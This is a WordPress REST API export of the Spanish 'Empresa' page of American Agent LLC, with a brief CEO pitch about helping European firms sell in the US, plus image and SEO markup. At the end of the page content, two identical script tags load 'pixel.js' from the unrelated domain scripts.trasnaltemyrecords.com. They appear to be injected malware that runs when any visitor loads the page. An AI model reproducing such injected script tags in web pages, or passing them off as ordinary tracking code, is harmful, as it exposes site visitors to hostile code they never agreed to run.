{"id":2990,"date":"2014-08-30T08:16:10","date_gmt":"2014-08-30T12:16:10","guid":{"rendered":"https:\/\/americanagent.com\/about-2\/"},"modified":"2014-09-10T16:40:28","modified_gmt":"2014-09-10T20:40:28","slug":"empresa","status":"publish","type":"page","link":"https:\/\/americanagent.com\/es\/empresa\/","title":{"rendered":"Empresa"},"content":{"rendered":"<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-0  el_before_av_two_third  avia-builder-el-first  first flex_column_div  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_image-38dfac12a23b4aae78a444437e4fb14d\">\n.avia-image-container.av-av_image-38dfac12a23b4aae78a444437e4fb14d img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-av_image-38dfac12a23b4aae78a444437e4fb14d .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-av_image-38dfac12a23b4aae78a444437e4fb14d av-styling- avia_animated_image av-animated-when-visible-95 top-to-bottom avia-align-center  avia-builder-el-1  avia-builder-el-no-sibling '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-4029 avia-img-lazy-loading-not-4029 avia_image ' src=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg\" alt='' title='about'  height=\"2592\" width=\"2022\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg 2022w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-234x300.jpg 234w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-803x1030.jpg 803w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-1170x1500.jpg 1170w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-549x705.jpg 549w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-450x576.jpg 450w\" sizes=\"(max-width: 2022px) 100vw, 2022px\" \/><\/div><\/div><\/div><\/div><div  class='flex_column av-av_two_third-bb0c93372dbfdfd42698443400a42550 av_two_third  avia-builder-el-2  el_after_av_one_third  avia-builder-el-last  flex_column_div  '     ><section  class='av_textblock_section av-av_textblock-7f317741ca2418a36614f046e139f8be '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span class='av_dropcap1 av-av_dropcap1-3cd9da5fea0ef5fb27aee617571c39a3'><span style=\"color: #000000;\">D<\/span><\/span>esde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles. Independientemente del servicio que se proporciona a nuestros clientes, nuestro objetivo es siempre conseguir la mejor estrategia de ventas posible para mejorar la presencia en el mercado de EE.UU.<\/p>\n<p>En la industria en general, el modelo de compra de las empresas estadounidenses ha cambiado dr\u00e1sticamente en los \u00faltimos a\u00f1os &#8211; Si usted desea abordar el mercado americano, es mejor tener un plan s\u00f3lido preparado y estar dispuesto a considerar nuevas estrategias.<\/p>\n<p>Me gustar\u00eda invitarle personalmente a contactar con nosotros, a presentar su negocio y a contarnos sus necesidades en EE.UU., porque le aseguramos que podemos aportar ideas que debe considerar.<\/p>\n<p><strong>Mr. Kari Koivuniemi<\/strong><\/p>\n<p><strong>CEO y Fundador<\/strong><\/p>\n<\/div><\/section><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-2990","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent LLC - Mercado de EE.UU.<\/title>\n<meta name=\"description\" content=\"Desde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/es\/empresa\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent LLC - Mercado de EE.UU.\" \/>\n<meta property=\"og:description\" content=\"Desde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/es\/empresa\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-10T20:40:28+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/empresa\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/empresa\\\/\",\"name\":\"American Agent LLC - Mercado de EE.UU.\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\"},\"datePublished\":\"2014-08-30T12:16:10+00:00\",\"dateModified\":\"2014-09-10T20:40:28+00:00\",\"description\":\"Desde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/empresa\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/es\\\/empresa\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/empresa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Empresa\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent LLC - Mercado de EE.UU.","description":"Desde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/es\/empresa\/","og_locale":"es_ES","og_type":"article","og_title":"American Agent LLC - Mercado de EE.UU.","og_description":"Desde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles.","og_url":"https:\/\/americanagent.com\/es\/empresa\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-10T20:40:28+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/es\/empresa\/","url":"https:\/\/americanagent.com\/es\/empresa\/","name":"American Agent LLC - Mercado de EE.UU.","isPartOf":{"@id":"https:\/\/americanagent.com\/es\/#website"},"datePublished":"2014-08-30T12:16:10+00:00","dateModified":"2014-09-10T20:40:28+00:00","description":"Desde el a\u00f1o 2002 hemos estado ayudando a las empresas europeas en el enfoque del mercado de EE.UU. con las estrategias de ventas m\u00e1s fuertes posibles.","breadcrumb":{"@id":"https:\/\/americanagent.com\/es\/empresa\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/es\/empresa\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/es\/empresa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/es\/"},{"@type":"ListItem","position":2,"name":"Empresa"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/es\/#website","url":"https:\/\/americanagent.com\/es\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/2990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/comments?post=2990"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/2990\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/media?parent=2990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}